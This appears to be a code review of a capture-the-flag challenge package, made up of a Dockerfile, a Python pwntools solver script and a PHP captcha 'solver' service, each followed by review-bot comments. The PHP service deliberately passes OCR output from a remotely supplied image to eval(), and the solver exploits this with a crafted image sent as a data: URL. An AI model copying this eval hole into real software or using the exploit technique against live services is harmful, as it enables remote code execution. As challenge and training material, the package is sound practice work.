--- /dev/null
+FROM alpine
+
+COPY pwnable flag.txt /home/ctf/
+
+#RUN apk --no-cache --update add socat tesseract-ocr tesseract-ocr-data-eng php7 &&
+RUN apk --no-cache --update add socat tesseract-ocr php7 php7-dom && \
+ adduser -D -g '' ctf
+
+WORKDIR /home/ctf
+USER ctf
+EXPOSE 1337
+ENTRYPOINT ["socat", "tcp-listen:1337,fork,reuseaddr", "exec:./pwnable,PTY,stderr,raw,echo=0"]
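Review bot: `FROM alpine` is untagged, so every rebuild tracks whatever `latest` is at the time, while the `RUN` line installs `php7` and `php7-dom`, which (as far as I know) newer Alpine releases no longer package. The image is therefore not reproducible and will probably stop building; pin the base to a release that still ships those packages, `FROM alpine:<pinned-release>`, ideally with a digest. `--update` is redundant next to `--no-cache`, and the commented-out `#RUN apk ...` line above it ends in a dangling `&&` and can be dropped. `COPY pwnable flag.txt /home/ctf/` leaves both files root-owned, which is right for a challenge the `ctf` user must not modify, but it relies on `pwnable` already being executable in the build context; `COPY --chmod=0555` for the script and a separate `COPY --chmod=0444` for the flag would make the intended permissions explicit.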
--- /dev/null
+#!/usr/bin/env python2
+from pwn import *
+from base64 import b64encode
+import sys
+
+if len(sys.argv) != 3:
+ print('Usage: ./exploit.py <ip> <port>')
+ sys.exit(1)
+
+ip = sys.argv[1]
+port = int(sys.argv[2])
+
+p = remote(ip, port)
+
+with log.waitfor('Encoding image') as h:
+ with open('exploit.png') as f:
+ pic = b64encode(f.read()).replace('+', '%2B').replace('=', '%3D')
+ h.success('Done')
+
+payload = '<img src="data:image/png;base64,%s">' % pic
+url = 'data:,' + payload
+
+print(p.recvuntil(' > '))
+info('Sending payload')
+p.sendline(url)
+p.recvline() # eat echoed output from readline
+
+while True:
+ x = p.recvline().strip()
+ if 'SOLUTION: ' in x:
+ print(x)
+ break
+ print('REMOTE: ' + x)
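Review bot: The final `while True:` loop exits only when a `SOLUTION: ` line arrives, so when the service prints `[-] Script died` and closes the connection the script ends with an unhandled EOF from `recvline()` instead of a clear failure. As the reference solver used to check that the challenge container is healthy, it should stop with a non-zero exit in that case, e.g. `if 'Script died' in x: sys.exit(1)`. `open('exploit.png')` reads a binary file in text mode and should be `open('exploit.png', 'rb')`. A short header comment stating that this is the solver for the bundled `pwnable` service, and that it is Python 2 only, would help the next maintainer.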
--- /dev/null
+#!/usr/bin/env php
+<?php
+echo "\n";
+echo " ___________\n";
+echo " / SPAMMERS \ || || _______\n";
+echo " -={ }=- || SPAMMER || | _____ |\n";
+echo " \ PARADISE / || || ||_____||\n";
+echo " ||_________|| | ___ |\n";
+echo " | + + + + | | |___| |\n";
+echo " _|_|_ \\ | |\n";
+echo " - Specify a url to a form to spam (_____) \\ | |\n";
+echo " - The first <img> is the captcha \\ ___ | |\n";
+echo " - Solver calculates math in image (2 + 3) ______ \\__/ \\_| |\n";
+echo " - Solution is displayed (5) | _ | _/ | |\n";
+echo " - $$$ M0NEY $$$ | ( ) | / |_______|\n";
+echo " |___|__| / CA15\n";
+echo " \\_____/\n";
+echo "Target > ";
+$target = fgets(STDIN);
+
+echo "[*] Fetching url...\n";
+$html = @file_get_contents($target);
+if(!$html) die("[-] Script died\n");
+
+echo "[*] Parsing html...\n";
+$dom = DOMDocument::loadHTML($html);
+$img = $dom->getElementsByTagName('img');
+$img = $img[0]->attributes['src']->value;
+
+echo "[*] Downloading captcha...\n";
+$img = @file_get_contents($img);
+if(!$img) die("[-] Script died\n");
+
+echo "[*] Reading captcha...\n";
+$path = tempnam('/tmp', 'img');
+$f = fopen($path, 'w');
+fwrite($f, $img);
+fclose($f);
+
+echo "[*] Solving captcha...\n";
+$captcha = trim(shell_exec("tesseract $path stdout"));
+$solution = eval("return $captcha;");
+echo "SOLUTION: $solution\n";
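Review bot: `eval("return $captcha;")` on the second-to-last line runs whatever text tesseract reads from a remotely supplied image as PHP, and nothing in the file says this is deliberate. If it is the intended challenge bug, mark it, e.g. `// INTENTIONALLY VULNERABLE (CTF): OCR output is evaluated as PHP; do not reuse outside the challenge container`. A real solver would accept only a strict `<int> <op> <int>` match and compute the result without `eval`. Separately from the intended bug, both `file_get_contents()` calls take an unvalidated location (`$target` is not even `trim()`med), so any stream wrapper or local path is accepted. The temp file from `tempnam()` is never removed (`unlink($path);` after the `shell_exec` call), and `$img[0]` is dereferenced without checking that the page contained an `<img>` at all.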